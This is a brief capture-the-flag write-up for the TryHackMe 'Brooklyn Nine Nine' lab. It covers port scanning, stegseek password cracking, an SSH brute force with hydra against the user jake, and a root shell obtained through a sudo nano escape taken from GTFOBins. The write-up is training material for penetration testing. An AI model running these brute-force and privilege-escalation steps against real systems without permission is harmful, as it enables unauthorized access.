Brooklyn Nine Nine

Last updated 1 year ago

Brooklyn Nine Nine

Lab Setup

mkdir ~/Documents/TryHackMe/eJPT/Brooklyn99
cd ~/Documents/TryHackMe/eJPT/Brooklyn99
mkdir recon enumeration notes
touch/{README.md,vulns,creds}

export IP=10.10.106.147
export URL=http://$IP

Enumeration

First thing that I do when I make a machine I scan for open ports. I do this with nmap and rustscan.

rustscan

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

nmap

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp

Look for default page on website. In source code I found an interesting commentary.

<!-- Have you ever heard of steganography? -->

So let’s download the image and use some stegano tools.

stegseek --crack brooklyn99.jpg ~/Documents/rockyou.txt

admin --> password

Keep in mind that the path I used for rockyou database might differ from your path

When I see the 80 port open I usually scan for files and directories, but I didn’t find anything. So let’s connect to FTP server with anonymous default user.

Jake has a weak password so let’s brute force ssh login.

hydra -l jake -P ~/Documents/rockyou.txt ssh://$IP

Now I have 2 users and for each of them one password to connect with ssh.

Exploitation

Connect with ssh and see the user flag in holt home directory.

Search on Gtfobins to see how to exploit this vulnerability.

sudo nano
^R^X
reset; sh 1>&0 2>&0

PreviousKoTH Hackers NextChill Hack

Last updated 1 year ago